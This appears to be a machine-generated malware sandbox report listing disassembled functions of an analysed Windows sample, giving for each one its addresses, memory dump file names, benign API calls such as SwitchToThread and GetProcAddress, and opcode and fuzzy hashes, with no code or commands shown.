                                                                                                                                                                                                                                  Function 00007FF6385E1112 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 519COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BreakDebug$CounterPerformanceQuery
                                                                                                                                                                                                                                  • String ID: GCHeap::Promote: Promote GC Root *%p = %p MT = %pT
                                                                                                                                                                                                                                  • API String ID: 3366438525-1582306835
                                                                                                                                                                                                                                  • Opcode ID: 328b25f9c2722ec70dc2ca1b2558c801ce1e0314ddb5f8d67d303e2d1c2caafc
                                                                                                                                                                                                                                  • Instruction ID: 34f4d324646eb9500f809a07d8ff5d8cc0092ca9fc8c011f49b90e76ae051e4f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 328b25f9c2722ec70dc2ca1b2558c801ce1e0314ddb5f8d67d303e2d1c2caafc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A32C223A09B4281EB918B35E8402F9A3A1BF457A5F046236D95ED77E5DF3EF444E308
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385E22B0 Relevance: 3.3, APIs: 2, Instructions: 343threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SwitchToThread.KERNEL32(?,-3333333333333333,?,?,00000001,00007FF6385E2BF0), ref: 00007FF6385E2476
                                                                                                                                                                                                                                  • SwitchToThread.KERNEL32(?,-3333333333333333,?,?,00000001,00007FF6385E2BF0), ref: 00007FF6385E24A5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                  • Opcode ID: a7c3b3acc85dbb1306d2a48614d20bd405700b54c1824a1551ee36e42e7a688c
                                                                                                                                                                                                                                  • Instruction ID: 23e85e7bd5d73b85b40acb1de205814a3f37780d41307bdc4e3050c7c4a194b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7c3b3acc85dbb1306d2a48614d20bd405700b54c1824a1551ee36e42e7a688c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3E1C233A0968286EA90CF31D9406F977A5FB447A0F056232EA5E87B98DF7DF441D708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385F4D50 Relevance: 2.2, APIs: 1, Instructions: 713COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ResetWatchWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 473789334-0
                                                                                                                                                                                                                                  • Opcode ID: 2a829564ebf833433eb3467ed6ceb505fe3d3f7be4c3edd56eb17aca68a46a26
                                                                                                                                                                                                                                  • Instruction ID: b5a611f49bbe11573f80ac8afe403576523a783384c04981cb9692a48090542d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a829564ebf833433eb3467ed6ceb505fe3d3f7be4c3edd56eb17aca68a46a26
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3862E133B18A46C6EA818F35A8402F463A1BF55798F145236E90EE37A1DF3EF445E708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385DFBA0 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                  • API String ID: 0-1684325040
                                                                                                                                                                                                                                  • Opcode ID: f42896eb4206faa703cb764e800ba36d1296ddac80f2e4f34e0a0c9d7cab88ad
                                                                                                                                                                                                                                  • Instruction ID: a4c1590a6b4b5c1139ad3f2e7b9477cd3e69ba56b7980f3506f2c8f46a769a1a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f42896eb4206faa703cb764e800ba36d1296ddac80f2e4f34e0a0c9d7cab88ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C412E133A08A4682EB548F25E8102F9B364FF45BA4F544232DE5D87B94DF3EE449E708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385F58E0 Relevance: .6, Instructions: 630COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8a6563889edc6ecb99000e239c18098e2630ba3ca172422791c0019219a34539
                                                                                                                                                                                                                                  • Instruction ID: 4ebd887d82003cff6b5ab0aaaf20d36d3c3e07db4c262f0c15eabf45d53ec95f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a6563889edc6ecb99000e239c18098e2630ba3ca172422791c0019219a34539
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B527333609B85C6DAA08F25E5402EAB7E1FB947E4F140536EA8D83798DF3DE444DB08
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385F6360 Relevance: .6, Instructions: 610COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f5c4ca3a004020a5879dad05a38fc3f5894829dd430128e6ca150d3be7238627
                                                                                                                                                                                                                                  • Instruction ID: e5b738f4b270a59d9c220b3b81fc2f415fddfc1ceca65b78b9d68c2eab0afffa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5c4ca3a004020a5879dad05a38fc3f5894829dd430128e6ca150d3be7238627
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8842F773A19786C5DAA08F25E4402AAB7E0FB54BE4F144136EE9D83B94DF3EE480D704
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385F2BF0 Relevance: .5, Instructions: 490COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2050909247-0
                                                                                                                                                                                                                                  • Opcode ID: a7e2e7787f1e3c033424a405c6a17149dd5fd2e1c8834cb8b0ae4887da05116f
                                                                                                                                                                                                                                  • Instruction ID: cd005478a0ae92be4762729a4f11061dd894fea5e02c2f6913c469e011b9d7fd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7e2e7787f1e3c033424a405c6a17149dd5fd2e1c8834cb8b0ae4887da05116f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B22AEA3E19646C6FAA5CB35A4406F866E1AF65790F14493AD80DD33A4DF3FB840E708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385E19D0 Relevance: .4, Instructions: 391COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a50a61b0d544852153949de20b5df4882e7441545f2fcf06068b516faf69eb73
                                                                                                                                                                                                                                  • Instruction ID: 9ad17371d5d48fb578a0c7f498c5643abf4703d309a09948771d36c0b2e60bf2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a50a61b0d544852153949de20b5df4882e7441545f2fcf06068b516faf69eb73
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0028E33A55A8186EA418F25D8546F8B7A4FB44BB1F455232EA2D873E4DF3EF441E308
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6386EC080 Relevance: .4, Instructions: 356COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 18f6f9baa0cc4248a236397378da8043617702aab2b20e8c0385ec93300a3a47
                                                                                                                                                                                                                                  • Instruction ID: 6331c5801ad136e2dea22c95a775d5cf3133cfb43a23361bef1db1d897860d59
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18f6f9baa0cc4248a236397378da8043617702aab2b20e8c0385ec93300a3a47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88E1F62361866186E7658B29E9507BD77A0FB86B80F109035EE4D83BD4DF3EE491FB04
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385D8AC0 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2f97bf6b6623dcb947a8753575cd351dbfa9345374227da16db6ec89478bebf9
                                                                                                                                                                                                                                  • Instruction ID: 4a96d7592dfdc068d6b8ea69b35497a3d0917dc1660c97a874a6c523b0f1d0f3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f97bf6b6623dcb947a8753575cd351dbfa9345374227da16db6ec89478bebf9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEC17F73A09A8682FAA09B25E8402F963E1FF48768F444536DD4D87365DF3EE059E708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385EB320 Relevance: .2, Instructions: 235COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ce5510cfb298c90b601b874e0e3a6c81c517a252392fda667ab81989b41b05d1
                                                                                                                                                                                                                                  • Instruction ID: f6721850356ec93363b349485a967ee090242e43f5460b0c568310265c29668f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce5510cfb298c90b601b874e0e3a6c81c517a252392fda667ab81989b41b05d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF912A13E1B74E41ED96873A55013F46292AF59796F1CAB32D90EB2790EF3FB481A304
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385CC490 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC4B3
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC4C8
